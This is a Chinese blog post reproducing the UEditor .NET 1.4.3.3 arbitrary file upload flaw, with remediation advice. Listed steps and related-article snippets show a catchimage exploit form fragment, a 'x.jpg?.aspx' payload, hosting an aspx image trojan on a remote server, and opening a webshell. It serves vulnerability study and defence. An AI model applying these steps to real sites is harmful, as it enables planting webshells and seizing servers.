ueidtor安全漏洞_UEditor上传漏洞复现

最新推荐文章于 2024-08-02 12:04:32 发布
最新推荐文章于 2024-08-02 12:04:32 发布
阅读量527 收藏
点赞数
文章标签: ueidtor安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39956451/article/details/112879030
版权
本文详细介绍了UEditor编辑器的一个安全漏洞,该漏洞存在于1.4.3.3(.net)版本中,允许恶意用户上传木马文件。复现过程包括访问特定URL、构造上传、制作并上传ASPx图片木马等步骤。为了防止此类攻击,建议限制上传目录的脚本执行权限,设置图片目录为只读,并修改源代码以加强文件上传过滤。
摘要由CSDN通过智能技术生成

UEditor编辑器介绍

UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。

漏洞影响版本

漏洞影响版本:1.4.3.3(.net),其他php,jsp,asp版本不受此UEditor的漏洞的影响。

最新版本为1.4.3.3,并且已经不支持更新了。

漏洞复现过程

1.漏洞地址:

http://xxxxxxxx/Manage/js/ueditor/net/controller.ashx?action=catchimage

访问后,返回下图,证明存在漏洞。

2.构造上传

shell addr:

3.制作aspx一句话图片木马

4.将木马FTP上传至远程云服务器:ftp://xx.xx.xx.xx/

5.通过python启动http服务,python -m http.server 8989

6.云服务器木马地址:

http://xx.xx.xx.xx:8989/111.jpg

7.访问poc.html,输入云服务器一句话图片木马地址,点sumbit,上传木马成功。

8.木马地址

http://xxxxxx/Manage/js/ueditor/net/upload/image/20201112/6374077383629687503565050.aspx

9.蚁剑连接木马,拿到webshell。

漏洞防范

1.目前临时的漏洞修复是建议,把文件上传目录设置无脚本执行权限,uploadvideo、uploadimage、catchimage、uploadscrawl、uploadfile、等等目录都设置为无脚本权限。

2.在百度UEditor官方没有出补丁前,设置图片目录为只读,禁止写入。

3.修改程序的源代码,对crawlerhandler源文件进行文件上传格式的严格过滤与判断。

weixin_39956451
关注
Ueditot_jsp SSRF漏洞复现
afei001
04-09 1036
目录 1.前言 2.漏洞概述 3.漏洞原理 4.影响版本 5.漏洞等级 6.漏洞复现 6.1 FAFO实战复现 6.2 Ueditor_SSRF_jsp-env_POC.py 7.漏洞修复 1.前言 今天在某项目对网站渗透测试时,发现某子域使用了Ueditor。百度Google发现其历史版本是有漏洞的,jsp环境的Ueditor存在SSRF,aspx环境的存在文件上传,竟然碰到了,就对该SSRF进行复现学习。 2.漏洞概述 该编辑器v1.4....
UEditor编辑器任意文件上传漏洞分析
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
12-03 1886
ue下载地址http://http://ueditor.baidu.com/website/download.html exp <form action="http://192.168.1.103/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="sour
ueditor 文件上传漏洞_UEditor .Net版本任意文件上传漏洞
weixin_30095343的博客
02-22 585
报告编号: B6-2018-082202报告来源: 360CERT报告作者: 360CERT更新日期: 2018-08-220x00 漏洞背景UEditor 是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。0x01 漏洞影响该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响。0x02 ...
ueditor】任意文件上传漏洞与解决方案
最新发布
菜鸟成长史
08-02 1320
是一款颇为老旧的富文本编辑器,曾经普遍流行过所以在一些老的项目里面,还会存在。但是该项目到目前为止已经永久停止更新,所以当发现漏洞时,只能自己维护。最好停止使用并更换富文本编辑器组件。
ueidtor安全漏洞_UEditor编辑器两个版本任意文件上传漏洞分析
weixin_39607090的博客
12-22 488
0x01 前言UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点 ,被广大WEB应用程序所使用;本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。0x0...
实战纪实 | 编辑器漏洞Ueditor-任意文件上传漏洞 (老洞新谈)
zkaqlaoniao的博客
04-12 1万+
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
UEditor 任意文件上传漏洞
zkaqlaoniao的博客
04-09 3319
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
ueidtor安全漏洞_UEditor SSRF漏洞(JSP版本)分析与复现
weixin_33318722的博客
12-31 4979
作者: 浮萍@猎户安全实验室公众号:[猎户安全实验室](https://mp.weixin.qq.com/s/OPbyYQNWiN2dy_BHhqd9eg "猎户安全实验室")前些时间测试的时候遇到了一个系统采用了UEditor编辑器,版本为1.4.3。已知该编辑器v1.4.3版本存在SSRF漏洞,虽然是Bool型的SSRF,除了可以进行内网探测外,也可以根据web应用指纹信息,之后进行进一步的测...
UEditor_JSP.zip_ UEditor_JSP_range_ueditor_ueditor jsp_ueditor j
09-22
Ueditor编辑器划分为了三层架构。其中,核心层为开发者提供了诸如range、selection、domUtils类的底层API接口,中间的命令插件层不仅提供了大量的基础command,还允许开发者基于核心层进行command命令的开发,而面向...
ueditor-1.1.2_ueditor-1.1.2_ueditor_ueditor:jar:1.1.2_ueditor-1.
10-01
ueditor-1.1.2.jar是UEditor的Java实现,它包含了一整套用于处理文本编辑、图片上传、视频插入等复杂操作的类库。这个JAR包使得开发者无需关注底层细节,只需简单调用API,就能在Java Web应用中轻松集成UEditor。其...
ue编辑器漏洞_ueditor getshell漏洞重现及分析
weixin_39633165的博客
12-21 1004
0x00 概述8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。0x01 漏洞重现Payload:shelladdr:图片马x.jpg放在自己服务器上提交http://www.domain.top/x.jpg?.aspx返回:菜刀连接:0x02 修复方案增加文件扩展名校验(白名单)0x03 漏洞分析uedi...
Ueditor百度编辑器JSP版
06-05
Ueditor百度编辑器JSP版本,图片附件上传通过测试好用。
ueditor编辑器php漏洞,关于编辑器:UEditor编辑器任意文件上传漏洞分析
weixin_31750655的博客
04-04 659
ue下载地址http://http://ueditor.baidu.com/website/download.htmlexpshell addr:咱们首先来看一下目录构造ue是一个典型的net webbin目录和app_code目录其中bin上面援用的是jsondll 因而这里咱们不剖析dll次要还是看app_code目录上面的cs文件 首先轻易跟进一个办法看看有没有任意文件上传的可能性首先看到u...
ueditor php 漏洞_XSS漏洞学习(一)Payload总结
weixin_39731271的博客
11-25 823
总结到最后还是有点乱, 将就看吧, 呜呜呜~有错误还请指出.基础知识弹窗的三个函数alert(7)prompt(7)confirm(7)on事件这里太多了, 没必要列完, 真用到其他事件时百度即可.onerror 错误onload 加载onclick 点击onchange 域的内容被改变onblur 元素失去焦点onfocus 元素获得焦点onmouseover 鼠标移...
ue编辑器漏洞_编辑器漏洞手册
weixin_39904612的博客
12-21 282
简介#2014年8月21日最初的手册版本,是由北洋贱队的各位朋友收集整理。时隔4年,我们再次整理了这些文件。目的是希望这种传统能延续下去。我们相信:星星之火可以燎原。希望大家能多提建议,完善这份手册。#2010年某月某日创建这样一个文档是为了能够使得众多需要得到帮助的人们,在她们最为困苦之时找到为自己点亮的那盏明灯,虽然这将揭示了某个寂静黑夜下一群躁动不安的人群.他们在享受快感,享受H4ck W0...
java 文件上传漏洞_网站漏洞修复之UEditor漏洞 任意文件上传漏洞
weixin_29050829的博客
02-13 1239
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文本编辑...
UEditor漏洞
热门推荐
2ed
07-29 1万+
UEditor是由百度开发的开源富文本编辑器,开源基于BSD协议,小巧灵活,使用简单,有很多web程序在使用UEditor编辑器。该任意文件上传漏洞存在于1.4.3.3和1.5.0版本中,并且只有.NET版本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器。
【解决方案】网站漏洞修复之UEditor漏洞 任意文件上传漏洞
sxycxfwzy的专栏
01-08 1953
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 漏洞从重现 我们下载官方UEditor 1.4.3.3版本,选择.net语言的,看最后更新日期是2016-05-26,我们找台服务器搭建
ueditor 编辑器增加css样式_UEditor踩坑记:解决自动添加<p>标签的方法
06-07
为了在UEditor编辑器中增加CSS样式,可以通过以下步骤来实现: 1. 打开UEditor的配置文件,一般来说是config.js文件。 2. 在“UEDITOR_CONFIG”对象中添加如下代码: ```javascript // 自定义样式 , 'customstyle':[ { tag:'h1', name:'tc f-26 lh-66', label:'大标题', style:'border-bottom:2px solid #000;font-size:26px;padding:26px 10px 10px;margin:10px 0 20px;' }, { tag:'h2', name:'tc f-20 lh-48', label:'中标题', style:'border-bottom:1px solid #ccc;font-size:20px;padding:10px;margin:10px 0 15px;' }, { tag:'p', name:'tc f-14 lh-30', label:'段落', style:'font-size:14px;line-height:30px;padding:10px;margin:10px 0;' } ] ``` 以上代码中,我们定义了三种自定义样式:大标题、中标题和段落。其中,每种样式都包括了标签、名称、标签显示的文字和CSS样式。 3. 在配置文件中找到“UEDITOR_CONFIG.toolbars”对象,找到需要使用自定义样式的工具栏按钮,例如“字号”按钮,将其配置修改为: ```javascript ['fontfamily', 'fontsize', '|', 'customstyle', 'bold', 'italic', 'underline', 'forecolor', 'backcolor', '|', 'justifyleft', 'justifycenter', 'justifyright', 'insertorderedlist', 'insertunorderedlist', '|', 'insertimage', 'insertvideo', '|', 'removeformat', 'source'] ``` 4. 保存配置文件,重新加载页面,即可在编辑器中看到自定义样式按钮。选中需要应用样式的文本,点击对应的按钮即可。 至于自动添加<p>标签的问题,可以在配置文件中找到“UEDITOR_CONFIG.filterRules”对象,将其中的“p”标签过滤规则删除即可。具体代码如下: ```javascript , filterRules: { // <!-- 过滤的标签 --> tagNames: { style: true, script: true, div: 1, p: 1 }, ... } ``` 将其中的“p: 1”删除即可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值